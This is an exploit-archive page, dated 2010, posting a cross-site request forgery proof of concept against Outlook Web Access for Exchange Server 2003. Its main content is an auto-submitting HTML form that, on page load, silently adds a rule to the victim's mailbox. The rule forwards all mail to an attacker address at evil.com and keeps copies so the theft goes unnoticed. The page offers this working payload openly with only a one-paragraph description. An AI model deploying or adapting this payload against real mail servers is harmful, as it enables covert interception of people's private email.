Home / os / win7

Outlook Web Access 2003 CSRF Vulnerability

Posted on 21 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Outlook Web Access 2003 CSRF Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==========================================
Outlook Web Access 2003 CSRF Vulnerability
==========================================

# Exploit Title: Microsoft Office Outlook Web Access for Exchange Server 2003 XSRF Vulnerability
# Date: 07/20/2010
# Author: anonymous
# Tested on: Microsoft Office Outlook Web Access for Exchange Server 2003
 
A cross-site request forgery vulnerability in Microsoft Office
Outlook Web Access for Exchange Server 2003 can be exploited to add
an automatic forwarding rule (as PoC) to the authenticated user's
account.
 
PoC:
&lt;form name=&quot;xsrf&quot; action=&quot;http://exchange.victim.com/Exchange/victim_id&quot; method=&quot;post&quot; target=&quot;_self&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;cmd&quot; value=&quot;saverule&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;rulename&quot; value=&quot;evilrule&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;ruleaction&quot; value=&quot;3&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;forwardtocount&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;forwardtoname&quot; value=&quot;guy, bad&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;forwardtoemail&quot; value=&quot;you@evil.com&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;forwardtotype&quot; value=&quot;SMTP&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;forwardtoentryid&quot; value=&quot;&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;forwardtosearchkey&quot; value=&quot;&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;forwardtoisdl&quot; value=&quot;&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;keepcopy&quot; value=&quot;1&quot;&gt;
&lt;body onload=&quot;document.forms.xsrf.submit();&quot;&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-21]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP